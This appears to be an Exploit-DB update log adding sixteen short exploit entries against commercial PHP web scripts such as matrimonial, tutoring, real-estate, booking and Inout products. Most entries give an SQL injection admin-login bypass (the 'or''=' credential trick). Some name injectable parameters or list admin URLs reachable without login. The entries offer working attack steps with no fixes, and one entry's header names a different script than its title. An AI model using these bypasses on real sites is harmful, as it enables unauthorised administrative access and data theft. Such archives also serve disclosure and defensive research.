DB: 2017-01-15

16 new exploits

My Private Tutor Website Script - Authentication Bypass
Hindu Matrimonial Script - Authentication Bypass
Just Dial Marketplace Script - Authentication Bypass
Entrepreneur Matrimonial Script - Authentication Bypass
Open Source Real-Estate Script - SQL Injection
Inout StickBoard 1.0 Script - Improper Access Restrictions
Inout Search Engine Ultimate Edition 7.0/8.0 Script - Improper Access Restrictions
Inout Webmail Ultimate Edition 4.0 Script - Improper Access Restrictions
Inout SmartDeal 1.0 Script - Improper Access Restrictions
Inout QuerySpace 1.0 Script - Improper Access Restrictions
Inout CareerLamp 1.0 Script - Improper Access Restrictions
Inout SocialTiles 2.0 Script - Improper Access Restrictions
Inout Celebrities 1.0 Script - Improper Access Restrictions
Education Website Script - Authentication Bypass
Professional Service Booking Script - SQL Injection
Courier Business Website Script - Authentication Bypass

files.csv

@@ -36981,3 +36981,19 @@ id,file,description,date,author,platform,type,port
 41037,platforms/php/webapps/41037.txt,"ECommerce-TIBSECART - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
 41038,platforms/php/webapps/41038.txt,"ECommerce-Multi-Vendor Software - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
 41040,platforms/linux/webapps/41040.txt,"Zeroshell 3.6.0/3.7.0 Net Services - Remote Code Execution",2017-01-13,"Ozer Goker",linux,webapps,0
+41043,platforms/php/webapps/41043.txt,"My Private Tutor Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
+41044,platforms/php/webapps/41044.txt,"Hindu Matrimonial Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
+41045,platforms/php/webapps/41045.txt,"Just Dial Marketplace Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
+41046,platforms/php/webapps/41046.txt,"Entrepreneur Matrimonial Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
+41047,platforms/php/webapps/41047.txt,"Open Source Real-Estate Script - SQL Injection",2017-01-13,"Ihsan Sencan",php,webapps,0
+41048,platforms/php/webapps/41048.txt,"Inout StickBoard 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
+41049,platforms/php/webapps/41049.txt,"Inout Search Engine Ultimate Edition 7.0/8.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
+41050,platforms/php/webapps/41050.txt,"Inout Webmail Ultimate Edition 4.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
+41051,platforms/php/webapps/41051.txt,"Inout SmartDeal 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
+41052,platforms/php/webapps/41052.txt,"Inout QuerySpace 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
+41053,platforms/php/webapps/41053.txt,"Inout CareerLamp 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
+41054,platforms/php/webapps/41054.txt,"Inout SocialTiles 2.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
+41055,platforms/php/webapps/41055.txt,"Inout Celebrities 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
+41056,platforms/php/webapps/41056.txt,"Education Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
+41058,platforms/php/webapps/41058.txt,"Professional Service Booking Script - SQL Injection",2017-01-13,"Ihsan Sencan",php,webapps,0
+41059,platforms/php/webapps/41059.txt,"Courier Business Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0

platforms/php/webapps/41043.txt

@@ -0,0 +1,12 @@
+# # # # # 
+# Vulnerability: Admin Login Bypass & SQLi
+# Date: 13.01.2017
+# Vendor Homepage: http://scriptfirm.com/
+# Script Name: Professional Service Booking Script
+# Script Buy Now: My Private Tutor Website
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
+# # # # # 

platforms/php/webapps/41044.txt

@@ -0,0 +1,29 @@
+# # # # # 
+# Vulnerability:: Admin Login Bypass & SQLi + Add/Edit
+# Date: 13.01.2017
+# Vendor Homepage: http://www.phpmatrimonialscript.in/
+# Script Name: Hindu Matrimonial Script
+# Script Buy Now: http://www.phpmatrimonialscript.in/product/hindu-matrimonial-script/
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+#
+# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
+#
+# Direct entrance Add/Edit...
+# http://localhost/[PATH]/admin/usermanagement.php
+# http://localhost/[PATH]/admin/countrymanagement.php
+# http://localhost/[PATH]/admin/communitymanagement.php
+# http://localhost/[PATH]/admin/renewaldue.php
+# http://localhost/[PATH]/admin/generalsettings.php
+# http://localhost/[PATH]/admin/cms.php
+# http://localhost/[PATH]/admin/cms.php
+# http://localhost/[PATH]/admin/newsletter1.php
+# http://localhost/[PATH]/admin/payment.php
+# http://localhost/[PATH]/admin/searchview.php
+# http://localhost/[PATH]/admin/success_story.php
+# http://localhost/[PATH]/admin/featured.php
+# http://localhost/[PATH]/admin/photo.php
+# http://localhost/[PATH]/admin/googleads.php
+# http://localhost/[PATH]/admin/reports.php
+# # # # # 

platforms/php/webapps/41045.txt

@@ -0,0 +1,12 @@
+# # # # # 
+# Vulnerability: Admin Login Bypass & SQLi
+# Date: 13.01.2017
+# Vendor Homepage: http://scriptfirm.com/
+# Script Name:  Just Dial Marketplace Script
+# Script Buy Now: http://scriptfirm.com/just-dial-marketplace
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
+# # # # # 

platforms/php/webapps/41046.txt

@@ -0,0 +1,12 @@
+# # # # # 
+# Vulnerability:: Admin Login Bypass & SQLi
+# Date: 13.01.2017
+# Vendor Homepage: http://www.phpmatrimonialscript.in/
+# Script Name: Entrepreneur Matrimonial Script
+# Script Buy Now: http://www.phpmatrimonialscript.in/product/entrepreneur-matrimonial/
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
+# # # # # 

platforms/php/webapps/41047.txt

@@ -0,0 +1,16 @@
+# # # # # 
+# Vulnerability: SQL Injection + Admin Login Bypass
+# Date: 13.01.2017
+# Vendor Homepage: http://phprealestatescript.org/
+# Script Name: Open Source Real-Estate Script
+# Script Buy Now: http://phprealestatescript.org/open-source-real-estate-script.html
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/viewpropertydetails.php?id=[SQL]
+# 
+# Admin Login Bypass
+# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
+# # # # # 

platforms/php/webapps/41048.txt

@@ -0,0 +1,22 @@
+# # # # # 
+# Vulnerability: Security Bypass
+# Date: 13.01.2017
+# Vendor Homepage: http://www.inoutscripts.com/
+# Script Name: Inout StickBoard Script
+# Script Version: v1.0
+# Script Buy Now: http://www.inoutscripts.com/demo/inout-stickboard/demo/
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# Direct entrance Add/Edit/Del...
+# An attacker can exploit this issue via a browser.
+# The following example URIs are available:
+# http://localhost/[PATH]/admin/account/clearcache
+# http://localhost/[PATH]/admin/account/changeprofileimage
+# http://localhost/[PATH]/admin/account/changepassword
+# http://localhost/[PATH]/admin/pin/websitepin
+# http://localhost/[PATH]/admin/user/manage
+# http://localhost/[PATH]/admin/user/userdetails/69
+# Vs.......
+# # # # # 

platforms/php/webapps/41049.txt

@@ -0,0 +1,21 @@
+# # # # # 
+# Vulnerability: Security Bypass
+# Date: 13.01.2017
+# Vendor Homepage: http://www.inoutscripts.com/
+# Script Name: Inout Search Engine Ultimate Edition Script
+# Script Version: v7.0, v8.0
+# Script Buy Now: http://www.inoutscripts.com/demo/inout-search-engine/demo/
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# Direct entrance..
+# An attacker can exploit this issue via a browser.
+# The following example URIs are available:
+# http://localhost/[PATH]/admin/index.php?page=engine/manage_suggestion
+# http://localhost/[PATH]/admin/index.php?page=databaseengine/managesettings
+# http://localhost/[PATH]/admin/index.php?page=seasonallogo/add
+# http://localhost/[PATH]/admin/index.php?page=seasonallogo/manage
+# http://localhost/[PATH]/admin/index.php?page=seasonallogo/add
+# Vs.......
+# # # # # 

platforms/php/webapps/41050.txt

@@ -0,0 +1,22 @@
+# # # # # 
+# Vulnerability: Security Bypass
+# Date: 13.01.2017
+# Vendor Homepage: http://www.inoutscripts.com/
+# Script Name: Inout Webmail Ultimate Edition v4.0
+# Script Version: Ultimate Edition v4.0, Ultimate Hypertable Version
+# Script Buy Now: http://www.inoutscripts.com/demo/inout-webmail/demo/
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# Direct entrance..
+# An attacker can exploit this issue via a browser.
+# The following example URIs are available:
+# http://localhost/[PATH]/admin/index.php?page=ads/sponsoredlinks
+# http://localhost/[PATH]/admin/index.php?page=todolist/todolist
+# http://localhost/[PATH]/admin/index.php?page=statistics/registration_showgraph
+# http://localhost/[PATH]/admin/index.php?page=statistics/showgraph
+# http://localhost/[PATH]/admin/index.php?page=statistics/accountactivity
+# http://localhost/[PATH]/admin/index.php?page=calendar/calendar
+# Vs.......
+# # # # # 

platforms/php/webapps/41051.txt

@@ -0,0 +1,19 @@
+# # # # # 
+# Vulnerability: Security Bypass
+# Date: 13.01.2017
+# Vendor Homepage: http://www.inoutscripts.com/
+# Script Name: Inout SmartDeal Script
+# Script Version: v1.0
+# Script Buy Now: http://www.inoutscripts.com/demo/inout-smartdeal/demo/
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# Direct entrance..
+# An attacker can exploit this issue via a browser.
+# The following example URIs are available:
+# http://localhost/[PATH]/admin/index.php?page=account/changepassword
+# http://localhost/[PATH]/admin/index.php?page=country/addcountry
+# http://localhost/[PATH]/admin/index.php?page=account/addbank
+# Vs.......
+# # # # # 

platforms/php/webapps/41052.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Vulnerability: Security Bypass
+# Date: 13.01.2017
+# Vendor Homepage: http://www.inoutscripts.com/
+# Script Name: Inout QuerySpace Script
+# Script Version: v1.0
+# Script Buy Now: http://www.inoutscripts.com/demo/inout-queryspace/demo/
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# Direct entrance..
+# An attacker can exploit this issue via a browser.
+# The following example URIs are available:
+# http://localhost/[PATH]/admin/user/search
+# Vs.......
+# # # # # 

platforms/php/webapps/41053.txt

@@ -0,0 +1,19 @@
+# # # # # 
+# Vulnerability: Security Bypass
+# Date: 13.01.2017
+# Vendor Homepage: http://www.inoutscripts.com/
+# Script Name: Inout CareerLamp Script
+# Script Version: v1.0
+# Script Buy Now: http://www.inoutscripts.com/demo/inout-careerlamp/demo/
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# Direct entrance..
+# An attacker can exploit this issue via a browser.
+# The following example URIs are available:
+# http://localhost/[PATH]/admin/statistics/js_registration_showgraph
+# http://localhost/[PATH]/admin/statistics/accountactivity
+# http://localhost/[PATH]/admin/statistics/js_showgraph
+# Vs.......
+# # # # # 

platforms/php/webapps/41054.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Vulnerability: Security Bypass
+# Date: 13.01.2017
+# Vendor Homepage: http://www.inoutscripts.com/
+# Script Name: Inout SocialTiles Script
+# Script Version: v2.0
+# Script Buy Now: http://www.inoutscripts.com/demo/inout-socialtiles/demo/
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# Direct entrance..
+# An attacker can exploit this issue via a browser.
+# The following example URIs are available:
+# http://localhost/[PATH]/admin/index.php?page=account/statussettings
+# http://localhost/[PATH]/admin/index.php?page=account/newad
+# Vs.......
+# # # # # 

platforms/php/webapps/41055.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Vulnerability: Security Bypass
+# Date: 13.01.2017
+# Vendor Homepage: http://www.inoutscripts.com/
+# Script Name: Inout Celebrities Script
+# Script Version: v1.0
+# Script Buy Now: http://www.inoutscripts.com/demo/inout-celebrities/demo/
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# Direct entrance..
+# An attacker can exploit this issue via a browser.
+# The following example URIs are available:
+# http://localhost/[PATH]/admin/settings/managersssettings
+# http://localhost/[PATH]/admin/settings/addrsssettings
+# Vs.......
+# # # # # 

platforms/php/webapps/41056.txt

@@ -0,0 +1,12 @@
+# # # # # 
+# Vulnerability:: Admin Login Bypass & SQLi
+# Date: 13.01.2017
+# Vendor Homepage: http://scriptfirm.com/
+# Script Name: Education Website Script
+# Script Buy Now: http://scriptfirm.com/education-website
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
+# # # # # 

platforms/php/webapps/41058.txt

@@ -0,0 +1,16 @@
+# # # # # 
+# Vulnerability: Admin Login Bypass & SQLi
+# Date: 13.01.2017
+# Vendor Homepage: http://scriptfirm.com/
+# Script Name: Professional Service Booking Script
+# Script Buy Now: http://scriptfirm.com/professional-service-booking-engine
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/best_pro_details.php?service_id=[SQL]
+# http://localhost/[PATH]/content.php?page=[SQL]
+# E.t.c.... Don't look for nothing there are also security vulnerabilities in other files as well.
+# # # # # 

platforms/php/webapps/41059.txt

@@ -0,0 +1,12 @@
+# # # # # 
+# Vulnerability: Admin Login Bypass & SQLi
+# Date: 13.01.2017
+# Vendor Homepage: http://scriptfirm.com/
+# Script Name:  Courier Business Website Script
+# Script Buy Now: http://scriptfirm.com/courier-business-website
+# Author: İhsan Şencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
+# # # # #